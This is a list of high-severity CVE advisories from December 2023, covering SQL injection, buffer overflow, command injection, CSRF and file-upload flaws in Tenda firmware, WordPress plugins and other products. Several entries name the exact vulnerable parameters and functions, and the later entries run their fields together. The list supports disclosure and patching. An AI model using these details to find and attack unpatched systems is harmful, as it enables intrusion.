projectworlds_pvt._limited -- student_result_management_system | Student Result Management System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'class_name' parameter of the add_classes.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-48717; help@fluidattacks.com
projectworlds_pvt._limited -- student_result_management_system | Student Result Management System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'class_name' parameter of the add_students.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-48718; help@fluidattacks.com
projectworlds_pvt._limited -- student_result_management_system | Student Result Management System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'roll_no' parameter of the add_students.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-48719; help@fluidattacks.com
projectworlds_pvt._limited -- student_result_management_system | Student Result Management System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'password' parameter of the login.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-48720; help@fluidattacks.com
projectworlds_pvt._limited -- student_result_management_system | Student Result Management System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'class_name' parameter of the add_results.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-48722; help@fluidattacks.com
projectworlds_pvt._limited -- student_result_management_system | Student Result Management System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'rno' parameter of the add_results.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-48723; help@fluidattacks.com
redpanda -- redpanda | Redpanda before 23.1.21 and 23.2.x before 23.2.18 has missing authorization checks in the Transactions API. | 2023-12-18 | 9.8 | CVE-2023-50976; cve@mitre.org
rmountjoy92 -- dashmachine | A vulnerability classified as problematic was found in rmountjoy92 DashMachine 0.5-4. Affected by this vulnerability is an unknown functionality of the file /settings/save_config of the component Config Handler. The manipulation of the argument value_template leads to code injection. The exploit has been disclosed to the public and may be used. The identifier VDB-248257 was assigned to this vulnerability. | 2023-12-17 | 9.8 | CVE-2023-6899; cna@vuldb.com
rmountjoy92 -- dashmachine | A vulnerability, which was classified as critical, has been found in rmountjoy92 DashMachine 0.5-4. Affected by this issue is some unknown functionality of the file /settings/delete_file. The manipulation of the argument file leads to path traversal: '../filedir'. The exploit has been disclosed to the public and may be used. VDB-248258 is the identifier assigned to this vulnerability. | 2023-12-17 | 9.1 | CVE-2023-6900; cna@vuldb.com
shenzen_libituo_technology_co.,_ltd -- lbt-t300-t310_firmware | Shenzhen Libituo Technology Co., Ltd LBT-T300-T310 v2.2.2.6 was discovered to contain a buffer overflow via the ApCliEncrypType parameter at /apply.cgi. | 2023-12-15 | 9.8 | CVE-2023-50469; cve@mitre.org
silabs -- gecko_software_development_kit | An unvalidated input in a library function responsible for communicating between secure and non-secure memory in Silicon Labs TrustZone implementation allows reading/writing of memory in the secure region of memory from the non-secure region of memory. | 2023-12-15 | 9.1 | CVE-2023-4020; product-security@silabs.com
softnext -- mail_sqr_expert | Softnext Mail SQR Expert is an email management platform. It has insufficient filtering for a special character within a specific function. A remote attacker authenticated as a localhost can exploit this vulnerability to perform command injection attacks, to execute arbitrary system commands, manipulate the system or disrupt service. | 2023-12-15 | 8 | CVE-2023-48380; twcert@cert.org.tw
softnext -- mail_sqr_expert | Softnext Mail SQR Expert has a path traversal vulnerability within its parameter in a specific URL. An unauthenticated remote attacker can exploit this vulnerability to bypass authentication and download arbitrary system files. | 2023-12-15 | 7.5 | CVE-2023-48378; twcert@cert.org.tw
solarwinds -- access_rights_manager | Sensitive data was added to our public-facing knowledgebase that, if exploited, could be used to access components of Access Rights Manager (ARM) if the threat actor is in the same environment. | 2023-12-21 | 7.6 | CVE-2023-40058; psirt@solarwinds.com
sourcecodester -- best_courier_management_system | A vulnerability classified as critical has been found in SourceCodester Best Courier Management System 1.0. Affected is an unknown function of the file manage_user.php. The manipulation of the argument id leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248256. | 2023-12-17 | 9.8 | CVE-2023-6898; cna@vuldb.com
starnight -- micro_http_server | In MicroHttpServer (aka Micro HTTP Server) through 4398570, _ReadStaticFiles in lib/middleware.c allows a stack-based buffer overflow and potentially remote code execution via a long URI. | 2023-12-17 | 9.8 | CVE-2023-50965; cve@mitre.org
tenda -- i29_firmware | Tenda i29 v1.0 V1.0.0.5 was discovered to contain a command injection vulnerability via the sysScheduleRebootSet function. | 2023-12-20 | 9.8 | CVE-2023-50983; cve@mitre.org
tenda -- i29_firmware | Tenda i29 v1.0 V1.0.0.5 was discovered to contain a buffer overflow via the ip parameter in the spdtstConfigAndStart function. | 2023-12-20 | 9.8 | CVE-2023-50984; cve@mitre.org
tenda -- i29_firmware | Tenda i29 v1.0 V1.0.0.5 was discovered to contain a buffer overflow via the lanGw parameter in the lanCfgSet function. | 2023-12-20 | 9.8 | CVE-2023-50985; cve@mitre.org
tenda -- i29_firmware | Tenda i29 v1.0 V1.0.0.5 was discovered to contain a buffer overflow via the time parameter in the sysLogin function. | 2023-12-20 | 9.8 | CVE-2023-50986; cve@mitre.org
tenda -- i29_firmware | Tenda i29 v1.0 V1.0.0.5 was discovered to contain a buffer overflow via the time parameter in the sysTimeInfoSet function. | 2023-12-20 | 9.8 | CVE-2023-50987; cve@mitre.org
tenda -- i29_firmware | Tenda i29 v1.0 V1.0.0.5 was discovered to contain a buffer overflow via the bandwidth parameter in the wifiRadioSetIndoor function. | 2023-12-20 | 9.8 | CVE-2023-50988; cve@mitre.org
tenda -- i29_firmware | Tenda i29 v1.0 V1.0.0.5 was discovered to contain a command injection vulnerability via the pingSet function. | 2023-12-20 | 9.8 | CVE-2023-50989; cve@mitre.org
tenda -- i29_firmware | Tenda i29 v1.0 V1.0.0.5 was discovered to contain a buffer overflow via the rebootTime parameter in the sysScheduleRebootSet function. | 2023-12-20 | 9.8 | CVE-2023-50990; cve@mitre.org
tenda -- i29_firmware | Tenda i29 v1.0 V1.0.0.5 was discovered to contain a stack overflow via the ip parameter in the setPing function. | 2023-12-20 | 9.8 | CVE-2023-50992; cve@mitre.org
tongda -- tongda_office_anywhere | A vulnerability was found in Tongda OA 2017 up to 11.10. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file general/vote/manage/delete.php. The manipulation of the argument DELETE_STR leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-248245 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2023-12-16 | 9.8 | CVE-2023-6885; cna@vuldb.com
totolink -- a7100ru_firmware | A vulnerability, which was classified as critical, was found in Totolink A7100RU 7.4cu.2313_B20191024. Affected is the function main of the file /cgi-bin/cstecgi.cgi?action=login of the component HTTP POST Request Handler. The manipulation of the argument flag with the input ie8 leads to buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248268. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2023-12-18 | 9.8 | CVE-2023-6906; cna@vuldb.com
tutao -- tutanota | Tutanota (Tuta Mail) is an encrypted email provider. Tutanota allows users to open links in emails in external applications. Prior to version 3.118.12, it correctly blocks the `file:` URL scheme, which can be used by malicious actors to gain code execution on a victim's computer, but fails to check other harmful schemes such as `ftp:`, `smb:`, etc., which can also be used. Successful exploitation of this vulnerability will enable an attacker to gain code execution on a victim's computer. Version 3.118.2 contains a patch for this issue. | 2023-12-15 | 9.3 | CVE-2023-46116; security-advisories@github.com
u-blox -- toby-l2 | A flaw in the input validation in TOBY-L2 allows a user to execute arbitrary operating system commands using specifically crafted AT commands. This vulnerability requires physical access to the serial interface of the module or the ability to modify the system or software which uses its serial interface to send malicious AT commands. Exploitation of the vulnerability gives full administrative (root) privileges to the attacker to execute any operating system command on TOBY-L2, which can lead to modification of the behavior of the module itself as well as the components connected with it (depending on its rights on other connected systems). It can further provide the ability to read system level files and hamper the availability of the module as well. This issue affects TOBY-L2 series: TOBY-L200, TOBY-L201, TOBY-L210, TOBY-L220, TOBY-L280. | 2023-12-20 | 7.6 | CVE-2023-0011; vulnerability@ncsc.ch
uffizio -- gps_tracker | A Remote Code Execution vulnerability exists in Uffizio's GPS Tracker all versions. The web server can be compromised by uploading and executing a web/reverse shell. An attacker could then run commands, browse system files, and browse local resources. | 2023-12-16 | 9.8 | CVE-2020-17485; cve@mitre.org
uffizio -- gps_tracker | An improper access control vulnerability exists in Uffizio's GPS Tracker all versions that leads to sensitive information disclosure of all the connected devices. By visiting the vulnerable host at port 9000, we see it responds with a JSON body that has all the details about the devices which have been deployed. | 2023-12-16 | 7.5 | CVE-2020-17483; cve@mitre.org
unrealircd -- unrealircd | A buffer overflow in websockets in UnrealIRCd 6.1.0 through 6.1.3 before 6.1.4 allows an unauthenticated remote attacker to crash the server by sending an oversized packet (if a websocket port is open). Remote code execution might be possible on some uncommon, older platforms. | 2023-12-16 | 7.5 | CVE-2023-50784; cve@mitre.org
wangmarket -- wangmarket | A vulnerability was found in xnx3 wangmarket 6.1. It has been rated as critical. Affected by this issue is some unknown functionality of the component Role Management Page. The manipulation leads to code injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-248246 is the identifier assigned to this vulnerability. | 2023-12-17 | 9.8 | CVE-2023-6886; cna@vuldb.com
wasmer_io -- wasmer | Wasmer is a WebAssembly runtime that enables containers to run anywhere: from Desktop to the Cloud, Edge and even the browser. Wasm programs can access the filesystem outside of the sandbox. Service providers running untrusted Wasm code on Wasmer can unexpectedly expose the host filesystem. This vulnerability has been patched in version 4.2.4. | 2023-12-22 | 8.4 | CVE-2023-51661; security-advisories@github.com
web-soudan -- mw_wp_form | The MW WP Form plugin for WordPress is vulnerable to arbitrary file deletion in all versions up to, and including, 5.0.3. This is due to the plugin not properly validating the path of an uploaded file prior to deleting it. This makes it possible for unauthenticated attackers to delete arbitrary files, including the wp-config.php file, which can make site takeover and remote code execution possible. | 2023-12-16 | 9.8 | CVE-2023-6559; security@wordfence.com
wordpress -- wordpress | Unrestricted Upload of File with Dangerous Type vulnerability in Zendrop Zendrop - Global Dropshipping. This issue affects Zendrop - Global Dropshipping: from n/a through 1.0.0. | 2023-12-20 | 10 | CVE-2023-25970; audit@patchstack.com
wordpress -- wordpress | Unrestricted Upload of File with Dangerous Type vulnerability in HM Plugin WordPress Job Board and Recruitment Plugin - JobWP. This issue affects WordPress Job Board and Recruitment Plugin - JobWP: from n/a through 2.0. | 2023-12-20 | 10 | CVE-2023-29384; audit@patchstack.com
wordpress -- wordpress | Deserialization of Untrusted Data vulnerability in Phpbits Creative Studio Genesis Simple Love. This issue affects Genesis Simple Love: from n/a through 2.0. | 2023-12-20 | 10 | CVE-2023-49772; audit@patchstack.com
wordpress -- wordpress | Deserialization of Untrusted Data vulnerability in Tim Brattberg BCorp Shortcodes. This issue affects BCorp Shortcodes: from n/a through 0.23. | 2023-12-20 | 10 | CVE-2023-49773; audit@patchstack.com
wordpress -- wordpress | Deserialization of Untrusted Data vulnerability in Hakan Demiray Sayfa Sayac. This issue affects Sayfa Sayac: from n/a through 2.6. | 2023-12-21 | 10 | CVE-2023-49778; audit@patchstack.com
wordpress -- wordpress | Unrestricted Upload of File with Dangerous Type vulnerability in WooRockets Corsa. This issue affects Corsa: from n/a through 1.5. | 2023-12-20 | 9.9 | CVE-2023-23970; audit@patchstack.com
wordpress -- wordpress | Unrestricted Upload of File with Dangerous Type vulnerability in Themely Theme Demo Import. This issue affects Theme Demo Import: from n/a through 1.1.1. | 2023-12-20 | 9.1 | CVE-2023-28170; audit@patchstack.com
wordpress -- wordpress | Unrestricted Upload of File with Dangerous Type vulnerability in Olive Themes Olive One Click Demo Import. This issue affects Olive One Click Demo Import: from n/a through 1.1.1. | 2023-12-20 | 9.1 | CVE-2023-29102; audit@patchstack.com
wordpress -- wordpress | Unrestricted Upload of File with Dangerous Type vulnerability in AmaderCode Lab Dropshipping & Affiliation with Amazon. This issue affects Dropshipping & Affiliation with Amazon: from n/a through 2.1.2. | 2023-12-20 | 9.9 | CVE-2023-31215; audit@patchstack.com
wordpress -- wordpress | Unrestricted Upload of File with Dangerous Type vulnerability in Unlimited Elements Unlimited Elements For Elementor (Free Widgets, Addons, Templates). This issue affects Unlimited Elements For Elementor (Free Widgets, Addons, Templates): from n/a through 1.5.65. | 2023-12-20 | 9.9 | CVE-2023-31231; audit@patchstack.com
wordpress -- wordpress | Deserialization of Untrusted Data vulnerability in xtemos WoodMart - Multipurpose WooCommerce Theme. This issue affects WoodMart - Multipurpose WooCommerce Theme: from n/a through 1.0.36. | 2023-12-21 | 9.8 | CVE-2023-32242; audit@patchstack.com
wordpress -- wordpress | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Daniel Söderström / Sidney van de Stouwe Subscribe to Category. This issue affects Subscribe to Category: from n/a through 2.7.4. | 2023-12-20 | 9.3 | CVE-2023-32590; audit@patchstack.com
wordpress -- wordpress | Unrestricted Upload of File with Dangerous Type vulnerability in WooCommerce AutomateWoo. This issue affects AutomateWoo: from n/a through 4.9.40. | 2023-12-20 | 9.9 | CVE-2023-33318; audit@patchstack.com
wordpress -- wordpress | Unrestricted Upload of File with Dangerous Type vulnerability in WPChill Download Monitor. This issue affects Download Monitor: from n/a through 4.8.3. | 2023-12-20 | 9.9 | CVE-2023-34007; audit@patchstack.com
wordpress -- wordpress | Unrestricted Upload of File with Dangerous Type vulnerability in Akshay Menariya Export Import Menus. This issue affects Export Import Menus: from n/a through 1.8.0. | 2023-12-20 | 9.9 | CVE-2023-34385; audit@patchstack.com
wordpress -- wordpress | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in realmag777 HUSKY - Products Filter for WooCommerce Professional. This issue affects HUSKY - Products Filter for WooCommerce Professional: from n/a through 1.3.4.2. | 2023-12-20 | 9.8 | CVE-2023-40010; audit@patchstack.com
wordpress -- wordpress | Unrestricted Upload of File with Dangerous Type vulnerability in Premio Folders - Unlimited Folders to Organize Media Library Folder, Pages, Posts, File Manager. This issue affects Folders - Unlimited Folders to Organize Media Library Folder, Pages, Posts, File Manager: from n/a through 2.9.2. | 2023-12-20 | 9.1 | CVE-2023-40204; audit@patchstack.com
wordpress -- wordpress | Unrestricted Upload of File with Dangerous Type vulnerability in Jeff Starr User Submitted Posts - Enable Users to Submit Posts from the Front End. This issue affects User Submitted Posts - Enable Users to Submit Posts from the Front End: from n/a through 20230902. | 2023-12-20 | 9 | CVE-2023-45603; audit@patchstack.com
wordpress -- wordpress | Unrestricted Upload of File with Dangerous Type vulnerability in Themify Themify Ultra. This issue affects Themify Ultra: from n/a through 7.3.5. | 2023-12-20 | 9.9 | CVE-2023-46149; audit@patchstack.com
wordpress -- wordpress | Missing Authorization vulnerability in Clever plugins Delete Duplicate Posts allows Accessing Functionality Not Properly Constrained by ACLs. This issue affects Delete Duplicate Posts: from n/a through 4.8.9. | 2023-12-19 | 9.8 | CVE-2023-47754; audit@patchstack.com
wordpress -- wordpress | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Porto Theme Porto Theme - Functionality. This issue affects Porto Theme - Functionality: from n/a before 2.12.1. | 2023-12-19 | 9.3 | CVE-2023-48738; audit@patchstack.com
wordpress -- wordpress | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Spoonthemes Couponis - Affiliate & Submitting Coupons WordPress Theme. This issue affects Couponis - Affiliate & Submitting Coupons WordPress Theme: from n/a before 2.2. | 2023-12-19 | 9.8 | CVE-2023-49750; audit@patchstack.com
wordpress -- wordpress | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Spoon themes Adifier - Classified Ads WordPress Theme. This issue affects Adifier - Classified Ads WordPress Theme: from n/a before 3.1.4. | 2023-12-20 | 9.3 | CVE-2023-49752; audit@patchstack.com
wordpress -- wordpress | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Hakan Demiray Sayfa Sayac. This issue affects Sayfa Sayac: from n/a through 2.6. | 2023-12-20 | 9.3 | CVE-2023-49776
audit@patchstack.com
wordpress -- wordpressUnrestricted Upload of File with Dangerous Type vulnerability in Symbiostock symbiostock. This issue affects Symbiostock: from n/a through 6.0.0.2023-12-209.1CVE-2023-49814
audit@patchstack.com
wordpress -- wordpressThe Theme My Login 2FA WordPress plugin before 1.2 does not rate limit 2FA validation attempts, which may allow an attacker to brute-force all possibilities, which shouldn't be too long, as the 2FA codes are 6 digits.2023-12-189.8CVE-2023-6272
contact@wpscan.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in Webbjocke Simple Wp Sitemap. This issue affects Simple Wp Sitemap: from n/a through 1.2.1.2023-12-178.8CVE-2023-24380
audit@patchstack.com
wordpress -- wordpressDeserialization of Untrusted Data vulnerability in Rocketgenius Inc. Gravity Forms. This issue affects Gravity Forms: from n/a through 2.7.3.2023-12-208.3CVE-2023-28782
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in BestWebSoft Contact Form to DB by BestWebSoft - Messages Database Plugin For WordPress. This issue affects Contact Form to DB by BestWebSoft - Messages Database Plugin For WordPress: from n/a through 1.7.0.2023-12-208.5CVE-2023-29096
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Favethemes Houzez - Real Estate WordPress Theme. This issue affects Houzez - Real Estate WordPress Theme: from n/a before 2.8.3.2023-12-208.2CVE-2023-29432
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Themefic Ultimate Addons for Contact Form 7. This issue affects Ultimate Addons for Contact Form 7: from n/a through 3.1.23.2023-12-208.5CVE-2023-30495
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in CreativeMindsSolutions CM Popup Plugin for WordPress. This issue affects CM Popup Plugin for WordPress: from n/a through 1.5.10.2023-12-208.5CVE-2023-30750
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Foxskav Easy Bet. This issue affects Easy Bet: from n/a through 1.0.2.2023-12-208.1CVE-2023-31092
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in CrawlSpider SEO Change Monitor - Track Website Changes. This issue affects SEO Change Monitor - Track Website Changes: from n/a through 1.2.2023-12-208.5CVE-2023-33209
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in Tagbox Tagbox - UGC Galleries, Social Media Widgets, User Reviews & Analytics. This issue affects Tagbox - UGC Galleries, Social Media Widgets, User Reviews & Analytics: from n/a through 3.1.2023-12-188.8CVE-2023-33214
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Alex Raven WP Report Post allows SQL Injection. This issue affects WP Report Post: from n/a through 2.1.2.2023-12-188.8CVE-2023-34168
audit@patchstack.com
wordpress -- wordpressAuthorization Bypass Through User-Controlled Key vulnerability in WooCommerce WooCommerce Square. This issue affects WooCommerce Square: from n/a through 3.8.1.2023-12-208.1CVE-2023-35876
audit@patchstack.com
wordpress -- wordpressDeserialization of Untrusted Data vulnerability in Themesflat Themesflat Addons For Elementor. This issue affects Themesflat Addons For Elementor: from n/a through 2.0.0.2023-12-198.3CVE-2023-37390
audit@patchstack.com
wordpress -- wordpressAuthorization Bypass Through User-Controlled Key vulnerability in WooCommerce GoCardless. This issue affects GoCardless: from n/a through 2.5.6.2023-12-208.2CVE-2023-37871
audit@patchstack.com
wordpress -- wordpressDeserialization of Untrusted Data vulnerability in UX-themes Flatsome | Multi-Purpose Responsive WooCommerce Theme. This issue affects Flatsome | Multi-Purpose Responsive WooCommerce Theme: from n/a through 3.17.5.2023-12-208.3CVE-2023-40555
audit@patchstack.com
wordpress -- wordpressThe Vrm 360 3D Model Viewer WordPress plugin through 1.2.1 is vulnerable to arbitrary file upload due to insufficient checks in a plugin shortcode.2023-12-188.8CVE-2023-4311
contact@wpscan.com
wordpress -- wordpressMissing Authorization, Cross-Site Request Forgery (CSRF) vulnerability in TienCOP WP EXtra allows Accessing Functionality Not Properly Constrained by ACLs, Cross Site Request Forgery. This issue affects WP EXtra: from n/a through 6.2.2023-12-198.8CVE-2023-46212
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in AdFoxly AdFoxly - Ad Manager, AdSense Ads & Ads.Txt. This issue affects AdFoxly - Ad Manager, AdSense Ads & Ads.Txt: from n/a through 1.8.5.2023-12-188.8CVE-2023-46617
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Master slider Master Slider Pro allows SQL Injection. This issue affects Master Slider Pro: from n/a through 3.6.5.2023-12-188.8CVE-2023-47506
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in WooCommerce WooCommerce Bookings. This issue affects WooCommerce Bookings: from n/a through 2.0.3.2023-12-188.8CVE-2023-47787
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in WooCommerce Canada Post Shipping Method. This issue affects Canada Post Shipping Method: from n/a through 2.8.3.2023-12-188.8CVE-2023-47789
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in Saint Systems Disable User Login. This issue affects Disable User Login: from n/a through 1.3.7.2023-12-188.8CVE-2023-47806
audit@patchstack.com
wordpress -- wordpressMissing Authorization, Cross-Site Request Forgery (CSRF) vulnerability in Roland Barker, xnau webdesign Participants Database allows Accessing Functionality Not Properly Constrained by ACLs, Cross Site Request Forgery. This issue affects Participants Database: from n/a through 2.5.5.2023-12-198.8CVE-2023-48751
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in Michael Winkler teachPress. This issue affects teachPress: from n/a through 9.0.4.2023-12-188.8CVE-2023-48755
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in Crocoblock JetElements For Elementor. This issue affects JetElements For Elementor: from n/a through 2.6.13.2023-12-188.8CVE-2023-48762
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in SVGator SVGator - Add Animated SVG Easily. This issue affects SVGator - Add Animated SVG Easily: from n/a through 1.2.4.2023-12-188.8CVE-2023-48766
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in CodeAstrology Team Quantity Plus Minus Button for WooCommerce by CodeAstrology. This issue affects Quantity Plus Minus Button for WooCommerce by CodeAstrology: from n/a through 1.1.9.2023-12-188.8CVE-2023-48768
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in Blue Coral Chat Bubble - Floating Chat with Contact Chat Icons, Messages, Telegram, Email, SMS, Call me back. This issue affects Chat Bubble - Floating Chat with Contact Chat Icons, Messages, Telegram, Email, SMS, Call me back: from n/a through 2.3.2023-12-188.8CVE-2023-48769
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in Arul Prasad J Prevent Landscape Rotation. This issue affects Prevent Landscape Rotation: from n/a through 2.0.2023-12-188.8CVE-2023-48772
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in WP Doctor WooCommerce Login Redirect. This issue affects WooCommerce Login Redirect: from n/a through 2.2.4.2023-12-188.8CVE-2023-48773
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in VillaTheme Product Size Chart For WooCommerce. This issue affects Product Size Chart For WooCommerce: from n/a through 1.1.5.2023-12-188.8CVE-2023-48778
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in Marketing Rapel MkRapel Regiones y Ciudades de Chile para WC. This issue affects MkRapel Regiones y Ciudades de Chile para WC: from n/a through 4.3.0.2023-12-188.8CVE-2023-48781
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in Saiful Islam Add to Cart Text Changer and Customize Button, Add Custom Icon. This issue affects Add to Cart Text Changer and Customize Button, Add Custom Icon: from n/a through 2.0.2023-12-188.8CVE-2023-49153
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in Wow-Company Button Generator - easily Button Builder. This issue affects Button Generator - easily Button Builder: from n/a through 2.3.8.2023-12-188.8CVE-2023-49155
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in Michael Winkler teachPress. This issue affects teachPress: from n/a through 9.0.5.2023-12-188.8CVE-2023-49163
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in OceanWP Ocean Extra. This issue affects Ocean Extra: from n/a through 2.2.2.2023-12-198.8CVE-2023-49164
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in Apasionados, Apasionados del Marketing, NetConsulting DoFollow Case by Case. This issue affects DoFollow Case by Case: from n/a through 3.4.2.2023-12-158.8CVE-2023-49197
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in Gift Up Gift Up Gift Cards for WordPress and WooCommerce. This issue affects Gift Up Gift Cards for WordPress and WooCommerce: from n/a through 2.21.3.2023-12-158.8CVE-2023-49744
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in SureTriggers SureTriggers - Connect All Your Plugins, Apps, Tools & Automate Everything!. This issue affects SureTriggers - Connect All Your Plugins, Apps, Tools & Automate Everything!: from n/a through 1.0.23.2023-12-158.8CVE-2023-49749
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in Ciprian Popescu Block for Font Awesome. This issue affects Block for Font Awesome: from n/a through 1.4.0.2023-12-178.8CVE-2023-49751
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in gVectors Team WooDiscuz - WooCommerce Comments. This issue affects WooDiscuz - WooCommerce Comments: from n/a through 2.3.0.2023-12-188.8CVE-2023-49759
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in Giannopoulos Kostas WPsoonOnlinePage. This issue affects WPsoonOnlinePage: from n/a through 1.9.2023-12-188.8CVE-2023-49760
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in Gravity Master Product Enquiry for WooCommerce. This issue affects Product Enquiry for WooCommerce: from n/a through 3.0.2023-12-188.8CVE-2023-49761
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in Creatomatic Ltd CSprite. This issue affects CSprite: from n/a through 1.1.2023-12-188.8CVE-2023-49763
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in SoftLab Integrate Google Drive. This issue affects Integrate Google Drive: from n/a through 1.3.4.2023-12-178.8CVE-2023-49769
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in Denis Kobozev CSV Importer. This issue affects CSV Importer: from n/a through 0.3.8.2023-12-178.8CVE-2023-49775
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in Innovative Solutions Fix My Feed RSS Repair. This issue affects Fix My Feed RSS Repair: from n/a through 1.4.2023-12-178.8CVE-2023-49816
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in PixelYourSite Product Catalog Feed by PixelYourSite. This issue affects Product Catalog Feed by PixelYourSite: from n/a through 2.1.1.2023-12-178.8CVE-2023-49824
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in realmag777 FOX - Currency Switcher Professional for WooCommerce. This issue affects FOX - Currency Switcher Professional for WooCommerce: from n/a through 1.4.1.4.2023-12-178.8CVE-2023-49834
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in Palscode Multi Currency For WooCommerce. This issue affects Multi Currency For WooCommerce: from n/a through 1.5.5.2023-12-188.8CVE-2023-49840
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in QuanticEdge First Order Discount Woocommerce. This issue affects First Order Discount Woocommerce: from n/a through 1.21.2023-12-188.8CVE-2023-49843
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in Kevin Ohashi WPPerformanceTester. This issue affects WPPerformanceTester: from n/a through 2.0.0.2023-12-188.8CVE-2023-49844
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in PayTR Ödeme ve Elektronik Para Kuruluşu A.Ş. PayTR Taksit Tablosu - WooCommerce. This issue affects PayTR Taksit Tablosu - WooCommerce: from n/a through 1.3.1.2023-12-188.8CVE-2023-49853
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in Tribe Interactive Caddy - Smart Side Cart for WooCommerce. This issue affects Caddy - Smart Side Cart for WooCommerce: from n/a through 1.9.7.2023-12-188.8CVE-2023-49854
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in BinaryCarpenter Menu Bar Cart Icon For WooCommerce By Binary Carpenter. This issue affects Menu Bar Cart Icon For WooCommerce By Binary Carpenter: from n/a through 1.49.3.2023-12-188.8CVE-2023-49855
audit@patchstack.com
